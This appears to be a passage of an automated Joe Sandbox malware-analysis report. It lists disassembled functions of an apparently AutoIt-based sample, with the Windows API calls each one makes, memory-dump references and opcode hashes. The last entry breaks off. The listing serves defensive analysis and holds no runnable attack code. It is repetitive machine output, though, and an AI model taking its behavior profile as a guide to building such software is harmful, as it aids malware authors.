                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                      • String ID:
                                                      • API String ID: 1378193009-0
                                                      • Opcode ID: e01883e8a2b558bb9a1715b02e68ee79bfb127926422aeab39234559cf21692c
                                                      • Instruction ID: a3469038d53c9d457232e0b4aa49f43c911167095b367f06680fec7883d5107f
                                                      • Opcode Fuzzy Hash: e01883e8a2b558bb9a1715b02e68ee79bfb127926422aeab39234559cf21692c
                                                      • Instruction Fuzzy Hash: E721F5B1944784AFE7729B249C45BE6BBECFF41308F04009DE79AD6182C3742984CB85
                                                      Function 008585B1 Relevance: 6.1, APIs: 4, Instructions: 65processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 008585E2
                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 008585E9
                                                      • CloseHandle.KERNEL32(00000004), ref: 00858603
                                                      • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00858632
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Process$CloseCreateCurrentHandleLogonOpenTokenWith
                                                      • String ID:
                                                      • API String ID: 2621361867-0
                                                      • Opcode ID: c893d8e2628e5a86dc569ab3c90fd065b425c1dc660065a7ce1db9c2f3182db8
                                                      • Instruction ID: 2c129426f429061a120ce8c2a89439c1c95990a8ca17b8422f2ee914af4a25e1
                                                      • Opcode Fuzzy Hash: c893d8e2628e5a86dc569ab3c90fd065b425c1dc660065a7ce1db9c2f3182db8
                                                      • Instruction Fuzzy Hash: DF114772501249EBDF019FA8DD49BEA7BA9FB08345F144065FE04E2161C7729E64AB60
                                                      Function 00876369 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                        • Part of subcall function 00805A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00867896,?,?,00000000), ref: 00805A2C
                                                        • Part of subcall function 00805A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00867896,?,?,00000000,?,?), ref: 00805A50
                                                      • gethostbyname.WS2_32(?), ref: 00876399
                                                      • WSAGetLastError.WS2_32(00000000), ref: 008763A4
                                                      • _memmove.LIBCMT ref: 008763D1
                                                      • inet_ntoa.WS2_32(?), ref: 008763DC
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                      • String ID:
                                                      • API String ID: 1504782959-0
                                                      • Opcode ID: 0bc822b4691457f8c1a7aa7c9b36c3675b4592748b6d3cb5d786f293102a42cf
                                                      • Instruction ID: 7487efab706f91f2545003d562307622a84f98f96326d031b2b2d5f0b4458610
                                                      • Opcode Fuzzy Hash: 0bc822b4691457f8c1a7aa7c9b36c3675b4592748b6d3cb5d786f293102a42cf
                                                      • Instruction Fuzzy Hash: D8112175500109AFCB04FBA8DD46CAE77B8FF04310B148065F505E72A2DB30DE54DB62
                                                      Function 00858B41 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • SendMessageW.USER32(?,000000B0,?,?), ref: 00858B61
                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00858B73
                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00858B89
                                                      • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00858BA4
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: MessageSend
                                                      • String ID:
                                                      • API String ID: 3850602802-0
                                                      • Opcode ID: 423cb7b883e04cd76d4539cefe97fe002ab8180c89bbea27509f5f5bf10b14c4
                                                      • Instruction ID: d5c0f017cbf9a8a97214d8953ab00913c96c729586b6c843adcafb7e1355e09f
                                                      • Opcode Fuzzy Hash: 423cb7b883e04cd76d4539cefe97fe002ab8180c89bbea27509f5f5bf10b14c4
                                                      • Instruction Fuzzy Hash: EC112E79901218FFDB11DF95CC85FADBB78FB48710F204196EA00B7250DA716E15DB94
                                                      Function 00861142 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0085FCED,?,00860D40,?,00008000), ref: 0086115F
                                                      • Sleep.KERNEL32(00000000,?,?,?,?,?,?,0085FCED,?,00860D40,?,00008000), ref: 00861184
                                                      • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,0085FCED,?,00860D40,?,00008000), ref: 0086118E
                                                      • Sleep.KERNEL32(?,?,?,?,?,?,?,0085FCED,?,00860D40,?,00008000), ref: 008611C1
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: CounterPerformanceQuerySleep
                                                      • String ID:
                                                      • API String ID: 2875609808-0
                                                      • Opcode ID: eafa4b47c81375d2f13cd5d0d376c8b4847f899c43a54ba5f678cdefd4f915f0
                                                      • Instruction ID: d9ff1000856cd283be3ab9ac224244b768f61e23a4cd01859c4178791614aa48
                                                      • Opcode Fuzzy Hash: eafa4b47c81375d2f13cd5d0d376c8b4847f899c43a54ba5f678cdefd4f915f0
                                                      • Instruction Fuzzy Hash: AE114835C0052DD7CF009FA8D848AEEBB78FB0A711F064056EA40F2242CA749590CB95
                                                      Function 0085D831 Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 0085D84D
                                                      • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 0085D864
                                                      • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 0085D879
                                                      • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 0085D897
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Type$Register$FileLoadModuleNameUser
                                                      • String ID:
                                                      • API String ID: 1352324309-0
                                                      • Opcode ID: 01101c367c27e2b9edd5669aa348b270ec48564ba395744f7b8aac4eecf1a33b
                                                      • Instruction ID: 472f86956ab71887b5f0eaaf369db32484dbe500910f6972990e7a085dd5e987
                                                      • Opcode Fuzzy Hash: 01101c367c27e2b9edd5669aa348b270ec48564ba395744f7b8aac4eecf1a33b
                                                      • Instruction Fuzzy Hash: C6115E75605309DBE3308F54EC08F92BBBCFB00B05F108979AE16D6051D7B0E5499BA1
                                                      Function 00836FB7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                      • String ID:
                                                      • API String ID: 3016257755-0
                                                      • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                      • Instruction ID: b512b41e4082b4a4cc20c01d56e7b75367c1f3e9f98143a9abe26327f10dffa6
                                                      • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                      • Instruction Fuzzy Hash: 0B014EB244454EBBCF2A5E88CC51CED3F62FB58354F588415FA1898031D236C9B1ABC1
                                                      Function 0088B2C5 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetWindowRect.USER32(?,?), ref: 0088B2E4
                                                      • ScreenToClient.USER32(?,?), ref: 0088B2FC
                                                      • ScreenToClient.USER32(?,?), ref: 0088B320
                                                      • InvalidateRect.USER32(?,?,?), ref: 0088B33B
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: ClientRectScreen$InvalidateWindow
                                                      • String ID:
                                                      • API String ID: 357397906-0
                                                      • Opcode ID: b8b061e71e577ec14668f2349cc17b6a2038dcf2caa6385093423318fac8c4ab
                                                      • Instruction ID: 64003bf9624fe73c4b2d6d0ebded1030da722b0dbd9cc10c2be24de1aab6ca25
                                                      • Opcode Fuzzy Hash: b8b061e71e577ec14668f2349cc17b6a2038dcf2caa6385093423318fac8c4ab
                                                      • Instruction Fuzzy Hash: 931147B5D00209EFDB41DF99C4449EEBBF5FF18310F104166E914E3220D735AA558F50
                                                      Function 0088B635 Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • _memset.LIBCMT ref: 0088B644
                                                      • _memset.LIBCMT ref: 0088B653
                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,008C6F20,008C6F64), ref: 0088B682
                                                      • CloseHandle.KERNEL32 ref: 0088B694
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: _memset$CloseCreateHandleProcess
                                                      • String ID:
                                                      • API String ID: 3277943733-0
                                                      • Opcode ID: 4e8e6642fc54682df3489549b3e20d9816bddb10722afcb937772ac98a92db03
                                                      • Instruction ID: a8ca59feffe8975a546940a71881367c222998a8e1c8fdabf7ef69363e3f362f
                                                      • Opcode Fuzzy Hash: 4e8e6642fc54682df3489549b3e20d9816bddb10722afcb937772ac98a92db03
                                                      • Instruction Fuzzy Hash: A4F012B25503147BE3106765BC06FBB7AACFB09795F404039FB09E5192EB759C2087A9
                                                      Function 00866BDA Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • RtlEnterCriticalSection.NTDLL(?), ref: 00866BE6
                                                        • Part of subcall function 008676C4: _memset.LIBCMT ref: 008676F9
                                                      • _memmove.LIBCMT ref: 00866C09
                                                      • _memset.LIBCMT ref: 00866C16
                                                      • RtlLeaveCriticalSection.NTDLL(?), ref: 00866C26
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: CriticalSection_memset$EnterLeave_memmove
                                                      • String ID:
                                                      • API String ID: 48991266-0
                                                      • Opcode ID: 2891495ce41ba0a741e13bd8dfbb9240875a887225c3748df6172a92bab4a41d
                                                      • Instruction ID: 6192b1c70f762bd0e8b4ebc28b55b2c5b4f9f404a71bd21fd92613c3469db87a
                                                      • Opcode Fuzzy Hash: 2891495ce41ba0a741e13bd8dfbb9240875a887225c3748df6172a92bab4a41d
                                                      • Instruction Fuzzy Hash: CEF05E3A200110BBCF016F59EC85A8ABB29FF45321F088061FE089E227D735E851CBB5
                                                      Function 00802218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetSysColor.USER32(00000008), ref: 00802231
                                                      • SetTextColor.GDI32(?,000000FF), ref: 0080223B
                                                      • SetBkMode.GDI32(?,00000001), ref: 00802250
                                                      • GetStockObject.GDI32(00000005), ref: 00802258
                                                      • GetWindowDC.USER32(?), ref: 0083BE83
                                                      • GetPixel.GDI32(00000000,00000000,00000000), ref: 0083BE90
                                                      • GetPixel.GDI32(00000000,?,00000000), ref: 0083BEA9
                                                      • GetPixel.GDI32(00000000,00000000,?), ref: 0083BEC2
                                                      • GetPixel.GDI32(00000000,?,?), ref: 0083BEE2
                                                      • ReleaseDC.USER32(?,00000000), ref: 0083BEED
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                      • String ID:
                                                      • API String ID: 1946975507-0
                                                      • Opcode ID: c78bb0b69ce0bb71bc77d93a51db75514e8bafe1d1348870c50a9b9283147116
                                                      • Instruction ID: 77a36fdf953611464867b504289c1e57c4b57368df26191eaee3bee9e7ecf743
                                                      • Opcode Fuzzy Hash: c78bb0b69ce0bb71bc77d93a51db75514e8bafe1d1348870c50a9b9283147116
                                                      • Instruction Fuzzy Hash: F8E06D72104244EADF225FA8FC4D7D83F10FB45332F108366FB69880E287B14990DB12
                                                      Function 00858712 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • GetCurrentThread.KERNEL32(00000028,00000000,?,00000000,00858195,?,?,?,008582E6), ref: 0085871B
                                                      • OpenThreadToken.ADVAPI32(00000000,?,?,?,008582E6), ref: 00858722
                                                      • GetCurrentProcess.KERNEL32(00000028,?,?,?,?,008582E6), ref: 0085872F
                                                      • OpenProcessToken.ADVAPI32(00000000,?,?,?,008582E6), ref: 00858736
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: CurrentOpenProcessThreadToken
                                                      • String ID:
                                                      • API String ID: 3974789173-0
                                                      • Opcode ID: 6049c25ce03afdeb8bab8510603cae8e8202e72a6e88359c6e31a6f503c0d559
                                                      • Instruction ID: 7afa78c7594a68edfb7f5cf3e3ab5f687c37b2c0136d36f1fed940efc080bf1e
                                                      • Opcode Fuzzy Hash: 6049c25ce03afdeb8bab8510603cae8e8202e72a6e88359c6e31a6f503c0d559
                                                      • Instruction Fuzzy Hash: E6E08636611312DFD7205FF55D0CB563BACFF54792F244828B745D9051DB348445C750
                                                      Function 0085B2F3 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • OleSetContainedObject.OLE32(?,00000001), ref: 0085B4BE
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000005.00000002.457479452.0000000000801000.00000040.00000001.01000000.00000005.sdmp, Offset: 00800000, based on PE: true
                                                      • Associated: 00000005.00000002.457476649.0000000000800000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008B4000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008BE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.00000000008C8000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457479452.0000000000947000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457505358.000000000094D000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457508098.000000000094E000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457518436.00000000009C2000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                      • Associated: 00000005.00000002.457522524.00000000009C3000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_5_2_800000_kudo.jbxd
                                                      Similarity
                                                      • API ID: ContainedObject
                                                      • String ID: AutoIt3GUI$Container
                                                      • API String ID: 3565006973-3941886329
                                                      • Opcode ID: a4a1928a391ea8e171d4b243b73bbf5f220efd95e707daf0bb26f82b46c0185d
                                                      • Instruction ID: ece737603834adc2b651873fc9d3e2fcc5c4a4c963ec16b889e90026425fc7c2
                                                      • Opcode Fuzzy Hash: a4a1928a391ea8e171d4b243b73bbf5f220efd95e707daf0bb26f82b46c0185d
                                                      • Instruction Fuzzy Hash: 38915870200601AFDB24DF68C884AAABBE5FF59711F20856DED4ACB391EB70E845CB50
                                                      Function 0086AFAC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                                                      Download Yara Rule
                                                      APIs
